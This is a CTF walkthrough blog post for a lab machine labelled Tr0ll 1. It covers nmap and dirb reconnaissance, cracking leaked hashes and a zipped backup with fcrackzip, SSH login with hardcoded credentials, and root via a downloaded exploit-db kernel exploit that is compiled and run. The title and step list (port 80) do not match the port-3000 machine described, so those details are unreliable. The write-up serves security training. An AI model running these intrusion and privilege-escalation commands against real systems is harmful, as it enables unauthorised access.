Hello, in this article I will show you step by step how to solve Tr0ll 1. The purpose of this CTF will be to become root and read /root/flag. Click to get more information about CTF.
LEVEL : Medium
Steps
- Learning the target’s IP address with Netdiscover tool
- Detection of open ports with Nmap tool
- Collecting information via port 80 with Dirb and Nikto tools
- Performing a Zip Password Brute Force attack with Fcrackzip tool
- Code Review and detect hardcoded secret
- Becoming root using Kernel Exploit
Based on the IP information of the Kali machine, the IP address used by the target machine was determined with the following command.
netdiscover -r 192.168.1.0/24
The detection of open ports on the target machine was done as follows.
nmap -A -Pn -n -sV --reason -p- 192.168.1.11
Fuzzing was performed via dirb on open port 3000.
dirb http://192.168.1.11:3000 -f
To obtain more information specifically for port 3000, a tool called nikto was used.
nikto -h 192.168.1.11:3000
With the information obtained from Nikto and Dirb, manual checks were started on port 3000. Some JS files are noted below for review.
When the content of the noted JS files was checked, a redirect was made to the address below and a content containing username, hashed passwords and role information was detected. These datas were noted and checks were continued.
Following these checks, a user “is_admin=true” was detected.
To obtain the cleartext version of the obtained hash passwords, the following web application was used and the detected password information was noted.
Below, it is shown that the detected passwords belong to the users.
First, SSH Login was tried with the user information obtained, and when no results were obtained, the application interface was logged in with the obtained users.
When the user “myP14ceAdm1nAcc0uNT” with Admin authority entered the application interface, it was determined that there was a “download backup” button, unlike the others. A backup file named “myplace.backup” has been downloaded.
Some checks were made on the extension of the downloaded file, but no results were obtained. Finally, the content is base64 decoded and the result is written to the file named tmp. The file downloaded here is actually a zip, but it turned out that it was base64 encoded and written into “myplace.blackup”.
cat myplace.backup | base64 -d > tmp
The tmp file asks for a password when unzipped. In this step, frackzip was used to guess the password and rockyou worldlist was provided. As a result, “magicword” was detected.
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt ./tmp
Unzip using “magicword” is done as follows
When the contents of the var folder obtained after the unzip process were checked, it was determined that it also contained the source codes of the NodeJS application running on port 3000.
When the source codes were reviewed, it was understood that the application was using MongoDB in the background and that this connection was provided with the following connectionString.
Using the username and password information obtained, “mark:5AYRft79VtFpc84”, the SSH checks made in the previous steps were repeated and this time access was obtained from the machine.
Some attempts were made on the Privilege Escalation side, but no results were obtained. The final step here is to download an exploit suitable for the kernel version of the target machine and become root then read root flag. Below, this process is carried out step by step.
wget https://www.exploit-db.com/download/44298
mv 44298 44298.c
gcc 44298.c -o exploit
./exploit
Summary
- I think it is an enjoyable machine with simple scenarios such as port enumeration, zip crack, Code Review and kernel exploitation. I recommend you figure it out at the beginning.
Click here to see my other articles about OSCP Walkthrough. Link
